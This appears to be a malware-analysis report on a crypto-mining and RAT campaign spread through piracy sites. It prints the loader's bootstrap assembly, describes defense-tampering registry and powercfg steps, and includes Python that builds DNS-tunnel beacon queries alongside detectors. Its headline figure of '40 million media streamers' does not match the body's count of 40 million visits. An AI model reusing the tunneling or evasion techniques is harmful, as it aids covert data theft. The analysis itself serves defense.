Massive Malware Ring Hijacks 40 Million Media Streamers and Book Piracy Hubs to Build Stealth Crypto-Mining Network

In late April 2026, incident response telemetry identified a sophisticated, multi-stage malware campaign propagating through illegal movie and television streaming platforms and compromised digital book libraries. The primary delivery vector is social engineering via web-based prompts. When a user attempts to stream video content or open a digital book, the compromised platform dynamically generates a counterfeit modal overlay. This alert mimics a critical system notification, informing the victim that their video player plugin or browser version is outdated and must be updated immediately to continue rendering content.

[Compromised Streaming/Book Site]
       │
       ▼ (Fake Plugin Update Notice)
[Downloaded ZIP Archive]
       │
       ▼ (Execution of Legitimate Binary)
[DLL Side-Loading (HLS Installer.874.exe + Malicious DLL)]
       │
       ▼ (Stack Overflow & ROP Chain)
[Decrypted Main Module (SilentCryptoMiner Fork)]

Clicking the call-to-action link downloads a ZIP archive. The archive carries a dual payload: a legitimate, digitally signed executable (e.g., HLS Installer.874.exe) paired with a weaponized dynamic-link library (DLL). By inducing the user to run the legitimate binary, the threat actors trigger classic DLL side-loading: the host application resolves the accompanying malicious library from its own directory, loads it into its memory space, and thereby launches the adversary's initial execution routine under the cover of a signed process. Because the file the user executes is genuinely signed, baseline signature-based detection of the launcher is defeated.

Infrastructure Evolution and Historical Campaign Alignment

Forensic evaluation of the infection chain and binary logic indicates that this campaign is not an isolated event, but rather the evolutionary continuation of a threat group active since at least 2022. Historically, the infrastructure relied on InterPlanetary File System (IPFS) gateways, distributing payload components from staging domains such as file[.]ipfs[.]us[.]69[.]mu. As those nodes were taken down or blacklisted, the threat actors adapted their command-and-control (C2) and hosting topologies, migrating to newer domains including urush1bar4[.]online.

[Figure: the structure of the archive has been preserved: inside is a legitimate executable and a large malicious DLL]

Parallel campaigns managed by the same threat collective utilize alternative front-end social engineering kits. For example, related infrastructure has been documented deploying a simulated browser crash page—falsely branding itself as a critical Chromium patch (chromium-patch-nightly)—to trigger identical archive downloads. The persistent survival of this operation across several years highlights a highly structured development cycle, wherein the operators continuously refine their crypters, modify staging domains, and update their primary payloads to minimize security telemetry footprints.

Distribution Metrics and Statistical Attack Surface

The potential reach of this operation is exceptionally broad due to the threat group’s choice of high-traffic distribution channels. Telemetry data from early 2026 confirms that the malware is actively embedded across mainstream pirated media ecosystems. The audience distribution spans from smaller digital book repositories pulling approximately 11,000 monthly unique visitors to massive streaming domains hosting between 2.1 million and 27.4 million monthly visitors. Aggregate exposure across all identified infection vectors reached approximately 40 million visits within a single monthly tracking window. By diversifying their placement across both literary and video streaming infrastructure, the threat actors maximize their demographic reach while complicating attribution efforts. The immense volume of incoming traffic ensures a steady influx of newly compromised hosts, which offsets the natural attrition rate of malware remediation by defensive teams.

Advanced Evasion: Junk Code and Stack Smashing ROP Chains

The weaponized DLL is built to frustrate automated sandbox analysis and manual reverse engineering. The binary is inflated with large blocks of randomly generated, non-functional instructions (junk code). This inflation serves two purposes: it pushes the file size past the scan limits of many secure web gateways and anti-malware engines, and it obscures the real control flow graph of the execution routine. Buried in this noise is a trigger that provokes a deliberate stack buffer overflow in an internal function dubbed SmashStack. The function allocates a fixed 64-byte buffer (stackBuf) on the stack and then writes unvalidated input past its end. Instead of crashing, the overflow overwrites the saved return address with the start of a Return-Oriented Programming (ROP) chain. The chain decrypts the next payload layer and transfers execution to shellcode concealed in the modified DOS header of the Portable Executable (PE) file; the bootstrap below is the first code that runs there.

pop r10                 ; peek at the return address on top of the stack...
push r10                ; ...and put it straight back (stack unchanged)
call $+5                ; push the address of the next instruction (pop rcx)
pop rcx                 ; rcx = address of this "pop rcx"
sub rcx, 9              ; pop r10 (2) + push r10 (2) + call (5) = 9 bytes -> rcx = start of the stub
mov rax, rcx
add rax, 5C1000h        ; decryption routine sits 0x5C1000 bytes past the stub
call rax                ; decrypt and reflectively map the main module
retn                    ; return to the address still on the stack

This compact bootstrap cannot rely on a fixed load address, so it computes one: call $+5 followed by pop rcx yields the address of the pop instruction, subtracting the 9 bytes occupied by the three preceding instructions gives the address of the stub itself, and adding 0x5C1000 locates the decryption function relative to the stub. The stub calls that function, which decrypts and reflectively loads the primary main module entirely in memory, leaving no unencrypted copy on disk.
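As an added example (not code from the report or from the malware's authors), the following Python scanner looks for the bootstrap above in a PE file's header region. It encodes the nine instructions as x86-64 machine code, accepts both valid encodings of mov rax, rcx, and recovers the call target as the stub's RVA plus the add immediate. The two PE images it builds are constructed for the demo; the stub's placement at offset 0x46 and the minimal header layout are assumptions.

```python
"""Scan a PE image for the DOS-header bootstrap stub described above.

Added example, not code from the original report: it encodes the stub's
nine instructions as x86-64 machine code and searches the header region
(everything before e_lfanew, where the DOS stub normally lives). The PE
images at the bottom are constructed for the demo and are not malware.
"""
import re
import struct

# Machine code for the listing above. "mov rax, rcx" has two valid
# encodings (48 89 C8 and 48 8B C1); both are accepted. The imm32 of
# "add rax, ..." is captured so the call target can be computed.
STUB_PATTERN = re.compile(
    rb"\x41\x5A"                        # pop r10
    rb"\x41\x52"                        # push r10
    rb"\xE8\x00\x00\x00\x00"            # call $+5
    rb"\x59"                            # pop rcx
    rb"\x48\x83\xE9\x09"                # sub rcx, 9
    rb"(?:\x48\x89\xC8|\x48\x8B\xC1)"   # mov rax, rcx
    rb"\x48\x05(?P<imm>.{4})"           # add rax, imm32
    rb"\xFF\xD0"                        # call rax
    rb"\xC3",                           # retn
    re.DOTALL,
)


def find_dos_header_stub(image: bytes):
    """Return {stub_rva, imm, target_rva} if the stub sits in the headers, else None.

    Headers map at RVA 0 with file offset equal to RVA, so the stub's file
    offset is its RVA and the call target is stub_rva + imm (the value rax
    holds when "call rax" runs). Translating that RVA to a file offset needs
    the section table and is left to the caller.
    """
    if len(image) < 0x40 or image[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if e_lfanew < 0x40 or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    m = STUB_PATTERN.search(image, 0, e_lfanew)   # only the header region
    if m is None:
        return None
    imm = struct.unpack("<I", m.group("imm"))[0]
    return {"stub_rva": m.start(), "imm": imm, "target_rva": m.start() + imm}


def _build_pe(dos_region: bytes) -> bytes:
    """Constructed sample: MZ header, the given bytes at 0x40, then a PE signature."""
    header = bytearray(b"MZ" + b"\x00" * 0x3E)          # 0x40-byte IMAGE_DOS_HEADER
    e_lfanew = (0x40 + len(dos_region) + 7) & ~7
    struct.pack_into("<I", header, 0x3C, e_lfanew)
    body = bytearray(header) + dos_region
    body += b"\x00" * (e_lfanew - len(body))
    return bytes(body + b"PE\0\0" + b"\x00" * 0x100)     # truncated NT headers suffice here


# Bytes of the listing above, mov encoded as 48 89 C8, add immediate 0x5C1000.
STUB_BYTES = (b"\x41\x5A\x41\x52\xE8\x00\x00\x00\x00\x59\x48\x83\xE9\x09"
              b"\x48\x89\xC8\x48\x05" + struct.pack("<I", 0x5C1000) + b"\xFF\xD0\xC3")
# The usual DOS stub that a normal linker emits.
BENIGN_STUB = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
               b"This program cannot be run in DOS mode.\r\r\n$")

SUSPICIOUS_IMAGE = _build_pe(b"\x90" * 6 + STUB_BYTES)  # stub hidden after 6 bytes of padding
BENIGN_IMAGE = _build_pe(BENIGN_STUB)

if __name__ == "__main__":
    for name, img in (("suspicious", SUSPICIOUS_IMAGE), ("benign", BENIGN_IMAGE)):
        print(name, find_dos_header_stub(img))
```

The search is deliberately confined to the bytes before e_lfanew: a stub that executes from the DOS header is abnormal regardless of what the rest of the image contains, and restricting the scan keeps the rule from matching the same instruction sequence legitimately sitting in a code section.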

Main Module Architecture and Defensive Neutralization

The core engine of the payload is a heavily customized, evasive fork of the open-source SilentCryptoMiner project. On first execution, the module verifies its environment to confirm it is running on a real target rather than an analysis sandbox. It collects the host processor architecture, the volume serial number of the system drive (C:), the user's privilege level, and the system timestamp. This data is exfiltrated by DNS tunneling: the malware constructs raw network packets and transmits the telemetry embedded in standard-looking DNS queries. To mask the traffic from network monitoring, the query names end in microsoft.com, but the raw packets are addressed directly to attacker-controlled IP addresses that have nothing to do with Microsoft, not to a legitimate resolver. The malware remains dormant until it receives a response containing the byte sequence 01 02 03 04 from its command infrastructure.
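The beacon and the corresponding network check, as an added example rather than the report's own tooling. The block builds the kind of query described above (hex-encoded telemetry in subdomain labels under a microsoft.com suffix), parses DNS wire format, and classifies an outbound UDP payload by destination and by the shape of its labels. The resolver addresses, the telemetry fields, the suffix telemetry.microsoft.com and the assumption that the 01 02 03 04 sequence appears verbatim in the reply are all constructed for the demo.

```python
"""DNS-tunnel beacon and its detection (added example, not the report's code).

Builds the query the module above would emit, telemetry hex-encoded into
labels under a microsoft.com suffix, then applies the check a sensor can run
on a captured UDP payload: where the packet went, and whether the leftmost
labels look like encoded data. Resolver list, telemetry and wake-up framing
are assumptions made for the demo.
"""
import binascii
import struct

LEGIT_RESOLVERS = {"10.0.0.53", "10.0.1.53"}   # assumed enterprise resolvers (constructed)
WAKEUP = b"\x01\x02\x03\x04"                    # activation sequence named in the report


def encode_qname(name: str) -> bytes:
    """Wire-format a dotted name: length-prefixed labels, zero terminator."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError(f"label length out of range: {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_dns_query(name: str, txid: int = 0x1337) -> bytes:
    """Standard recursive query, one question, type A, class IN."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(name) + struct.pack(">HH", 1, 1)


def beacon_query(telemetry: bytes, suffix: str = "telemetry.microsoft.com") -> bytes:
    """Hex-encode telemetry into 32-char labels beneath the lookalike suffix (assumed scheme)."""
    hexed = binascii.hexlify(telemetry).decode()
    labels = [hexed[i:i + 32] for i in range(0, len(hexed), 32)]
    return build_dns_query(".".join(labels + [suffix]))


def parse_dns_query(payload: bytes) -> dict:
    """Parse the header and the single question; reject anything else."""
    if len(payload) < 12:
        raise ValueError("short DNS payload")
    txid, flags, qdcount = struct.unpack_from(">HHH", payload, 0)
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    labels, off = [], 12
    while True:
        if off >= len(payload):
            raise ValueError("truncated question name")
        n = payload[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(payload[off:off + n].decode("ascii", "replace"))
        off += n
    if off + 4 > len(payload):
        raise ValueError("truncated question")
    qtype, qclass = struct.unpack_from(">HH", payload, off)
    return {"txid": txid, "qname": ".".join(labels), "qtype": qtype, "qclass": qclass}


def classify_dns(dst_ip: str, payload: bytes, resolvers=LEGIT_RESOLVERS) -> dict:
    """Verdict plus reasons for one outbound UDP payload."""
    try:
        q = parse_dns_query(payload)
    except (ValueError, struct.error) as exc:
        return {"verdict": "not-dns", "reasons": [str(exc)], "qname": None}
    reasons = []
    if dst_ip not in resolvers:
        reasons.append(f"DNS query sent directly to {dst_ip}, not a configured resolver")
    qname = q["qname"].lower()
    if qname.endswith("microsoft.com") and dst_ip not in resolvers:
        reasons.append("microsoft.com name used as cover for a non-resolver destination")
    hex_labels = [l for l in qname.split(".")
                  if len(l) >= 16 and all(c in "0123456789abcdef" for c in l)]
    if hex_labels:
        reasons.append(f"{len(hex_labels)} hex-looking label(s) of 16+ chars: encoded payload")
    return {"verdict": "suspicious" if reasons else "benign",
            "reasons": reasons, "qname": q["qname"]}


def is_wakeup_response(payload: bytes) -> bool:
    """Assumption: the activation sequence appears verbatim in the reply payload."""
    return WAKEUP in payload


# Constructed telemetry: arch | volume serial | privilege | timestamp.
TELEMETRY = b"x64|1A2B3C4D|admin|1714560000"
BEACON = beacon_query(TELEMETRY)

if __name__ == "__main__":
    print(classify_dns("203.0.113.7", BEACON))
    print(classify_dns("10.0.0.53", build_dns_query("www.microsoft.com")))
```

The first two rules are the strong ones: on a managed network, port 53 traffic to anything other than the configured resolvers is itself anomalous, and a microsoft.com name on such a packet is exactly the decoy described above. The hex-label rule also fires on some legitimate CDN and telemetry hostnames, so treat it as a scoring signal rather than a verdict on its own.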

[Figure: the module's behavior across its different operational stages]

Once authorized, if running with elevated administrative privileges, the main module systematically neutralizes host defenses through a series of automated system changes:

  • Antivirus exclusions: configures Windows Defender to ignore all .exe and .dll files under critical system roots, including %USERPROFILE%, %PROGRAMDATA%, and %WINDIR%.
  • MSRT removal: deletes Microsoft's Malicious Software Removal Tool (mrt.exe) through the native API (ZwSetInformationFile with the FileDispositionInformation class) rather than the Win32 DeleteFile call.
  • Update prevention: writes a DontOfferThroughWUAU DWORD value of 1 under HKLM\Software\Policies\Microsoft\MRT, so Windows Update no longer offers a replacement copy of the removal tool.
  • Power state: suppresses sleep and hibernation on both the AC and the DC (battery) power profiles via powercfg, keeping the machine awake and its compute available for mining:
powercfg /x -hibernate-timeout-ac 0
powercfg /x -hibernate-timeout-dc 0
powercfg /x -standby-timeout-ac 0
powercfg /x -standby-timeout-dc 0

Following defensive neutralization, the malware establishes permanent system persistence. It stages a duplicate copy of itself within C:\ProgramData\Google\Chrome and registers a fake system service named GoogleUpdateTaskMachineQC configured for automatic system startup.

Multi-Stage Privileged vs. Non-Privileged Execution Flows

The malware's installation and persistence strategies change depending on the privileges it inherits at launch. This fork does not use a technical UAC bypass; it relies on a UAC prompt-fatigue loop to obtain elevation.

Privilege level  | Persistence mechanism                              | Defensive action                                                           | Injection strategy
Elevated (admin) | GoogleUpdateTaskMachineQC service                  | Adds Windows Defender exclusions, deletes MSRT, disables sleep/hibernation | Four reflective loads into conhost.exe and explorer.exe
Standard (user)  | Run key under HKCU\...\Windows\CurrentVersion\Run  | Triggers UAC prompts every 3 minutes                                       | Loops persistence checks until the service installation succeeds

If launched in an unprivileged (standard user) context, the malware copies its binary to %USERPROFILE%\AppData\Roaming\Sandboxie and adds a startup entry under the current user's registry Run key. It then enters an infinite loop, raising a User Account Control (UAC) authorization prompt every three minutes. The loop runs until the user gives in to warning fatigue and clicks "Yes," granting the installer the administrative rights it needs to configure the permanent service.

Sub-Component Injections: Watchdog, RAT, and Crypto-Miners

Once administrative status is confirmed, the main module writes none of its sub-components to disk. Instead, it performs four independent reflective memory injections into standard Windows processes. The Remote Access Trojan (RAT) payload is injected into the console host process (conhost.exe), giving operators command-line control, file system exfiltration, and remote reconfiguration of the asset. Concurrently, a Watchdog module is injected into the Windows shell (explorer.exe). Its sole job is to scan running processes for Task Manager, Process Hacker, or other diagnostics tools; when one is detected it immediately kills the miner processes so the user sees nothing unusual. The mining payload is split between a CPU mining module and a GPU mining module, each running reflectively inside its own explorer.exe context. The installer enumerates the system's display adapters through hardware enumeration APIs: if a discrete, high-performance graphics card is present, the GPU miner is launched to hijack its compute cycles; if only integrated graphics are available, the GPU module stays dormant to avoid the lag that would alert the user to the infection.

[Figure: an example of a request to the C2 server]

Our Technical Opinion on This Case

This campaign illustrates a highly effective convergence of social engineering, evasive binary design, and living-off-the-land techniques that highlights a growing maturity in commodity cybercrime operations. Pirated media platforms remain a highly profitable initial access vector: users seeking unauthorized content are already conditioned to bypass browser warnings, disable security controls, and download files from questionable origins, which neutralizes traditional perimeter security. From an architectural standpoint, the malware's evasion techniques are unusually sophisticated for a crypto-mining operation. Smashing its own stack to run a custom ROP chain that lands in the DOS header shows a familiarity with anti-analysis methods usually seen in targeted corporate espionage or advanced persistent threat (APT) activity. Keeping the RAT and miner components memory-only through reflective loading, with no file ever written, also leaves file-integrity monitoring tools with nothing to observe.

The aggressive defense evasion, specifically the forced deletion of Microsoft's Malicious Software Removal Tool and the policy change that stops Windows Update from replacing it, demonstrates an intent to maintain long-term persistence on the victim's host. By pairing a hidden background miner with a fully functional Remote Access Trojan, the threat group establishes a dual-revenue infrastructure: it extracts immediate financial value from hijacked hardware while retaining the access needed to pivot into identity theft, credential harvesting, or selling network access to ransomware brokers. Defensive strategies must therefore move beyond file-hash checking and focus on unauthorized memory injections, unexpected DNS tunneling patterns (in particular DNS traffic sent anywhere other than the configured resolvers), and rogue service registrations and policy changes.